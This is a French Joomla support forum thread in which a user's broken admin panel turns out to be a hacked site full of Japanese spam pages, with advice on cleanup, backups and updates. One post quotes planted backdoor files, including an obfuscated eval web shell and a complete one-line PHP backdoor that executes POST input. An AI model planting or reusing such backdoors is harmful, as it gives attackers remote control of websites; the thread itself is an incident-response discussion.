accès au panneau d'administration

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] accès au panneau d'administration

    Bonjour,

    C'est mon premier post ici ( après deux ans d'utilisation de Joomla ).

    J’expérimente le problème suivant avec Joomla 3.x ( sauf erreur x=2 ):


    En ajoutant «*/administrator/index.php*» à l’url de mon site, il m’est demandé comme d’habitude d’introduire mon nom d’administrateur et mon mot de passe.
    Cela étant fait, au lieu d’accéder au panneau de gestion du site, je tombe sur une page au fond blanc, avec des rubriques de titres «*Contenu*» , «*Structure*» , «*Utilisateurs »,«*Configuration*» etc.. , et des liens spécifiques à chacune de ces rubriques.

    Aucun de ces lien ne donne un résultat ( ils font apparaitre des pages blanches vides ).

    A partir de là, je ne trouve pas le moyen de faire apparaitre le panneau convivial à laquelle je suis habitué.

    Je ne crois pas avoir fait de manipulations particulières modifiant la configuration de Joomla ces derniers temps ( la dernière manipulation consistait à ajouter un lien à un article ).

    Je viens de remarquer que la page d'accueil de mon site (ici ) ne s'affiche plus,
    même si par ailleurs il semble fonctionner normalement.


    Voyez-vous une explication ?

    Meilleures salutations
    Dernière édition par photon69 à 08/02/2016, 15h35 Raison: cet aspect du problème est résolu

  • #2
    Re : accès au panneau d'administration

    Bonjour, alors déjà tu utilises des cadres... Et ça ça n'existe plus depuis 10ans, car niveau référencement c'est une catastrophe.
    Peut-être devrais tu déjà commencer par refaire tes pages sans cadre ?

    Deuxièment, quand je vais sur http://bratschi.ensr.ch/administrator/index.php, çe me met une erreur 404

    Commentaire


    • #3
      Re : accès au panneau d'administration

      À première (et même à deuxième) vue le site indiqué ci-dessus n'est pas un site créé avec Joomla. Il va donc être très difficile de t'aider.
      Lorsque l'on se cogne la tête contre un pot et que cela sonne creux, ça n'est pas forcément le pot qui est vide.
      Confucius

      Commentaire


      • #4
        Re : accès au panneau d'administration

        Bonjour,
        Envoyé par christophe31 Voir le message
        Bonjour, alors déjà tu utilises des cadres... Et ça ça n'existe plus depuis 10ans, car niveau référencement c'est une catastrophe.
        Peut-être devrais tu déjà commencer par refaire tes pages sans cadre ?

        Deuxièment, quand je vais sur http://bratschi.ensr.ch/administrator/index.php, çe me met une erreur 404
        Quand on regarde le source du site
        Code HTML:
        <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 TRANSITIONAL//EN">
        <HTML>
        <HEAD>
         <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
         <META NAME="KEYWORDS" content="Bertrand, Bratschi, Math&eacute;matiques, Maths, Physique, Physics">
         <TITLE>http://Bratschi.ENSR.ch</TITLE>
         <script> resizeTo(1400,777);</script>
        <FRAMESET ROWS="107,*">
        <FRAME NAME="navig" SRC="HeaderIpads#haut" FRAMEBORDER="1" NORESIZE SCROLLING="no">
        <FRAMESET NAME="B" COLS="18%,*">
        <FRAME NAME="present" SRC="exp1.html" FRAMEBORDER="0" NORESIZE>
        <FRAME NAME="texte" SRC="http://bratschi.ensr.ch/Joomla_3/index.php/homepage" FRAMEBORDER="0" NORESIZE MARGINHEIGHT="20px" MARGINWIDTH="40px">
        </FRAMESET>
        </FRAMESET>
        </HEAD>
        <BODY>
        </BODY>
        </HTML>
        L'URL à chercher est paumée là dedans http://bratschi.ensr.ch/Joomla_3/index.php/homepage
        Pas de demande de support par MP.
        S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

        Commentaire


        • #5
          Re : accès au panneau d'administration

          ok ... c'est un peu le bordel
          tu as un site avec des frames qui appelle un site Joomla .... tu aimes les complications non ? lol

          Pour en revenir a ton problème Joomla, tu as une page blanche -> donc une erreur fatale masquée ... tu dois mettre le rapport d'erreur au max en rentrant dans ton admin ici

          En passant ... Joomla c'est cool, ça va vite ... mais tu dois absolument suivre les mises a jour ... ton site est resté en 3.3.6 !!!
          Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
          Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

          Commentaire


          • #6
            Re : accès au panneau d'administration

            Bonjour, merci beaucoup pour vos réponses !

            christophe31

            Oui, les cadres n’existent plus depuis 10 ans, mais justement, le site a plus de 10 ans… Il était initialement réalisé en html. J’ai installé Joomla depuis 2 ans ce qui depuis me simplifie bien le travail.
            Par contre je ne crois pas que cela soit la cause de problème, Quand au référencement cela n’est pas ma priorité.

            « Deuxièment, quand je vais sur http://bratschi.ensr.ch/administrator/index.php, çe me met une erreur 404"

            -> Pour le login, il faut essayer http://bratschi.ensr.ch/Joomla_3/adm...ator/index.php
            Normalement cela me permet d’accéder au panneau d’admin, mais depuis ce matin ça ne marche plus.


            lesoutier

            "À première (et même à deuxième) vue le site indiqué ci-dessus n'est pas un site créé avec Joomla. »

            -> En effet, mais ce site utilise un système Joomla standard, géré de façon standard, qui fonctionne en qq.sorte comme un sous système.
            Pour accéder à Joomla sans passer par ces liens, l’adresse est http://bratschi.ensr.ch/Joomla_3/index.php
            Cela affiche normalement la page d’accueil qui malheureusement à aussi disparu depuis ce matin.


            jisse03

            Oui, je fait appel aux liens suivants ( depuis http://bratschi.ensr.ch )


            1) /Joomla_3/index.php/homepage que tu as trouvé ( et qui n’affiche plus rien depuis ce matin).

            ainsi que ceux assignés aux trois boutons colorés en haut à droite

            2) /Joomla_3/index.php/maths-ib
            3) /Joomla_3/index.php/physics-ib
            4) /Joomla_3/index.php/tc-tok

            qui eux fonctionnent encore normalement.


            Même si ma façon de procéder ( avec ces fenêtre et ces lien ) n’est pas très orthodoxe, je ne vois pas en quoi cela serait la cause du problème.
            Jusqu’à présent ça a toujours très bien fonctionné.

            manu93

            Qu'entends-tu par "mettre le rapport d'erreur au max" ?
            Le lien que tu me donne ( ici ) est celui qui ne me permet plus d'accéder au panneau d'administration ( mais seulement au login ).
            Merci pour le conseil des mises à jour !
            ( Comment as-tu fait pour déterminer la version que j'utilise ? )
            Dernière édition par photon69 à 02/02/2016, 15h44

            Commentaire


            • #7
              Re : accès au panneau d'administration

              Ci-dessous le contenu de la page ( liens désactivés ) qui s'affiche à la place du panneau d'administration.

              Dans quelle cas une telle page apparait normalement ?
              Dans quelle(s) situation(s) cette page remplace le panneau d'administration ?
              Comme je l'ai dit plus haut, ses nombreux liens n'ouvrent que des pages vide.

              Je ne sais vraiment pas quoi faire !
              Bonne soirée.

              ----------------


              Contenu
              • Ajouter un article
              • Gestion Articles
              • Gestion Catégories
              • Gestion Médias
              Structure
              • Gestion Menus
              • Gestion Modules
              Utilisateurs
              • Gestion Utilisateurs
              Configuration
              • Configuration
              • Gestion Templates
              • Gestion Langues
              Extensions
              • Installer Extensions
              • Kunena Forum
              Maintenance
              • Vérification de version Joomla...
              • VérificationÂ*des extensions...

              Des messages de post-installation sont disponibles
              Des messages de post-installation importants requièrent votre attention. Pour afficher ces messages, veuillez cliquer sur le bouton 'Consulter les messages' ci-dessous.
              Vous pouvez consulter les messages Ã* n'importe quel moment en cliquant sur le menu 'Composants=> Messages de post-installation' de la section administration de votre site. Cet espace d'information n'apparaît pas lorsque vous avez caché tous les messages.

              Consulter les messages

              Utilisateurs connectés
              Super User Administration
              2016-02-02
              Articles populaires
              4026 Welcome !
              2012-01-01
              1146 IB1 Maths last tests
              2014-10-16
              1070 IB1 Maths Pre-Tests & Exercises
              2014-12-09
              434 IB1 Maths Internal Examinations
              2014-12-23
              375 IB1 Maths Tests 2015-2016
              2015-09-06
              Articles les plus récents
              Sujets de l'examen de Noël 2015 Super User
              2015-12-07
              Work & Energy Super User
              2015-11-25
              Project 4 Super User
              2015-11-12
              Impulse & Momentum Super User
              2015-11-07
              IB2 Physics Tests Super User
              2015-10-31

              Commentaire


              • #8
                Re : accès au panneau d'administration

                Bonjour

                Pas de chargement du CSS ni du javascripy.

                Soiy le site a été piraté, soit des fichiers ont disparu.
                Dans les 2 cas, une analyse complète s'impose. Commencer par utiliser un scanner pour contrôler http://www.aesecure.com/fr/blog/aese...uick-scan.html
                Pas de demande de support par MP.
                S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                Commentaire


                • #9
                  Re : accès au panneau d'administration

                  Envoyé par jisse03 Voir le message
                  Bonjour

                  Pas de chargement du CSS ni du javascripy.

                  Soiy le site a été piraté, soit des fichiers ont disparu.
                  Dans les 2 cas, une analyse complète s'impose. Commencer par utiliser un scanner pour contrôler http://www.aesecure.com/fr/blog/aese...uick-scan.html

                  Hé oui, mon site a été piraté !
                  Des pages en japonais ( plus de 500 !) ont été déposées ces 3 derniers jours ( exemple : http://bratschi.ensr.ch/g-shop-36y_G3G.html ).

                  Vaut-il mieux installer ce scanner pour un diagnostic plus précis ou signaler le problème à l'hébergeur du site ?

                  Bonne journée

                  Commentaire


                  • #10
                    Re : accès au panneau d'administration

                    Ce n'est pas le rôle de l'hébergeur que de nettoyer ton site après une attaque, mais le tien.

                    Dans ce cas précis, il y a eu injection LFI (et peut-être également de l'injection SQL. Il te faut appliquer les méthodes indiquées
                    Pas de demande de support par MP.
                    S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                    Commentaire


                    • #11
                      Re : accès au panneau d'administration

                      Bonjour,
                      L'attaque (injection LFI ?) a débuté le 29.janvier à 9:26.
                      En témoignent les premiers fichiers qui précède les centaines html en japonais.
                      Ce sont par ordre chonologique :
                      wp-misc.php
                      conns.php.suspected
                      uploadnew.php.suspected

                      Le premier commence ainsi :

                      <?php if(isset($_GET["t6985n"])){ $auth_pass="";$color="#df5";$default_action="Files Man";$default_use_ajax=true;$default_charset="Wind ows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x 61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65 \x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq......

                      Le contenu du second est

                      <?php ($www= $_POST['yt']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>

                      Commentaire


                      • #12
                        Re : accès au panneau d'administration

                        Bonjour,

                        La stratégie suivante vous semble-t-elle suffisante pour restaurer mon site ?

                        1) Supprimer les trois fichiers mentionnés plus haut.
                        2) Supprimer les milliers ( maintenant le nombre a triplé ) de fichiers html parasites.
                        3) Réinstaller Joomla ( la dernière version )

                        Bonne journée.

                        Commentaire


                        • #13
                          Re : accès au panneau d'administration

                          Une autre solution qu'on me propose et de revenir à un état antérieur du site à partir d'une sauvegarde réalisée au début de l'année.
                          ( Cette opération réalisée par le fournisseur de service est couteuse ). A partir de là je pourrais updater Joomla. Qu'en pensez-vous ?

                          Commentaire


                          • #14
                            Re : accès au panneau d'administration

                            Dans tous les cas de figure, le grand nettoyage de printemps s'impose. Que ce soit en nettoyant toi-même le tout ou en payant pour retrouver un site sain, c'est indispensable.

                            Ensuite il faudra veiller à ce que tout soit à jour (Joomla!, extensions y compris plugins et templates) et sécuriser le tout (aesecure, rawlprotect, admintools ou autre.
                            Pas de demande de support par MP.
                            S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                            Commentaire


                            • #15
                              Re : accès au panneau d'administration

                              Envoyé par jisse03 Voir le message
                              Dans tous les cas de figure, le grand nettoyage de printemps s'impose. Que ce soit en nettoyant toi-même le tout ou en payant pour retrouver un site sain, c'est indispensable.

                              Ensuite il faudra veiller à ce que tout soit à jour (Joomla!, extensions y compris plugins et templates) et sécuriser le tout (aesecure, rawlprotect, admintools ou autre.

                              Oui, un nettoyage en profondeur s'impose sérieusement !

                              Encore une question, juste par curiosité: En supposant que leur but est d'héberger gratuitement leur pages de publicité, quel est l'intérêt pour ces "pirates" de détruire ainsi des ressources de Jommla ?
                              S'ils avaient pas altéré le fonctionnement du site, leur contenu serait resté plus d'une semaine. ( et en rassemblant discrètement ces pages dans un dossier, l'opération pourrait passer inaperçue bien plus longtemps...). Ou alors le but est seulement d'être malveillant ?

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X